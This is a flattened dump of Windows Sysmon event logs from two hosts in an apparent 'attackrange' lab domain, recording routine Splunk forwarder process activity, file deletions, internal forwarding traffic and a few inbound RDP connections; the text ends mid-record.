10341000x80000000000000001049532Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:46.029{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049531Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:46.029{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8A1E-6151-1F7A-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049530Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:46.029{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A1E-6151-1F7A-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049529Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:46.015{5EBD8912-8A1E-6151-1F7A-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978217Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:46.242{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=36394B8949D3E320CB79F811EA04C9F7,SHA256=939E76A813E5B65A9DCB734125DBF572158A119A5184A675FC81C2E155A71556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978219Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:47.633{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C15BAF30F8AA3473C2E61349A19FF8F,SHA256=67063F8775A0084FB6629B3C3CCC271399FC2380C46136B271BFA228421B0AAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049539Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:45.789{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53317-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049538Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:46.997{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47EF71825B0051106CBBA6434829FBD9,SHA256=EA54F834313B7B982BC4203283DC498FCA31515D5EED77DF95CA7CAF1E408207,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978220Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:48.633{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCAE9030E7947FB657CAF23F5115EF55,SHA256=ACDDBA99438A8CD1A41B8DD5FD959D195C225ECC99A669D8E86F2866E88256B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049540Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:48.011{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A4C9B122EC0CE267DB6145A494E0B8C,SHA256=13B98FAEA7D603A7F30C0AA5852BAF352B0DEA3FED5E342FF771068637B4CBC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978221Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:49.649{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4F0A763F9E0A838BE9F6F0DC4186A73,SHA256=211D7FAFBD4E626DCC3A99EE2CB05F4C33B6CD465E2B5E3A6BA1B21717BC5263,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049541Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:49.015{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FCB0BEAE2139CAABBBF6B5DD3BBFF60,SHA256=20D2097F7EEDA38432B01C8EAA47F00C7FA020BE2798AE7E489AD2C9DC8A3B95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978222Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:50.664{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E3A65A5B12492AF23C57FE215D6D064,SHA256=330615208167655D7C5FFB2A94D8FBF3C215886016BBFBA1035AB858D8FB7B7B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001049543Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:08:50.249{5EBD8912-7F30-614D-1100-00000000FC01}404C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b37f-0x49498ee9) 23542300x80000000000000001049542Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:50.018{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7240248D4833DCD2E34193FBFBE09FF3,SHA256=B81BA39762669CB73EE828564D931DC9266A0202DB861360EFFAD39E707E5FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978224Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:51.680{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=078AC3A406718FE2D1606A19C863ADEF,SHA256=F8910BE39413846087A589C916BC3C5E6E387821BB5C94664D5086D9413F56C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049544Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:51.048{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B35D4C8D99920CA2D0B4D497B1778281,SHA256=5C727759EE5ADB418496C0CE915DDE8F752B5206592FFCB2A451C23DF7590FAF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978223Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:47.653{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59349-false10.0.1.12-8000- 23542300x8000000000000000978227Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:52.696{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=069E013F39532BD33E60F874BEB224DD,SHA256=0AEB78263AF090992DB303837A63558144427FF25D2E5C5B319A38CD1F4D613E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049545Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:52.064{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE1D7A849919F220D599AC6AE3064A23,SHA256=6057853DEE4C052A08D324ABC0A3A06653A3951302F1CC598975643D30C755D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978226Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:52.117{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37745D87D6555065853970C12EDB5C6B,SHA256=A118C832FDA16ED1360C8B2B9B2F8018382352FEA49DCA5B4C6A95632D187497,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978225Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:52.117{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6901ADF677AAF8A6A898A484D82D6801,SHA256=84B85673CEC6D0ECBA912F91A7D8980C1504351A903530D29DE916BF09076FB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978230Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:53.930{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37745D87D6555065853970C12EDB5C6B,SHA256=A118C832FDA16ED1360C8B2B9B2F8018382352FEA49DCA5B4C6A95632D187497,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978229Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:53.711{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74AC0AC758F550C7AA7FD90641015CD1,SHA256=5E48CCEB8E7A33EBF61E94CB2A64ADCA2AC06295A1D803564F259A1A6E992BB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049549Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:53.831{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BFDCA6FC0AD5A59AC7971B72D8E8EBE,SHA256=155A6A29959FF34A4D54C7BF13CA95095D84AD0A554C7D8D0A01DDBDD4E24BCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049548Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:53.831{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0165FAB1CA04F834B7A1486034A591C4,SHA256=2016DBEABA00CF78427F52F6C96BCD2F7A3AE860A6577E62F514BC8032DE191A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049547Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:51.790{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53318-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049546Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:53.078{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88CC4C8EEE0BCFB5528903B70128BDD6,SHA256=9B6E1C5BF57500B756B0C5DD0983C008D4CBC76EDD79ADA43FC4A943928B67D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978228Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:49.418{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49844-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978232Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:54.727{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D09E2F2BA2357B1F3DAB8D35A82D540A,SHA256=6F283C3F9C4955175264CD2301C65DEA6E7870360E8090DF839042AA42B60F5D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049570Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.902{5EBD8912-8A26-6151-217A-00000000FC01}46044180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049569Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.749{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8A26-6151-217A-00000000FC01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049568Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.749{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049567Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.749{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049566Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.749{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049565Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.749{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049564Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.749{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8A26-6151-217A-00000000FC01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049563Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.749{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8A26-6151-217A-00000000FC01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049562Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.735{5EBD8912-8A26-6151-217A-00000000FC01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001049561Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:52.574{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54772-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001049560Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:52.220{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-51519-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001049559Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.250{5EBD8912-8A26-6151-207A-00000000FC01}6224944C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049558Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:54.102{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program 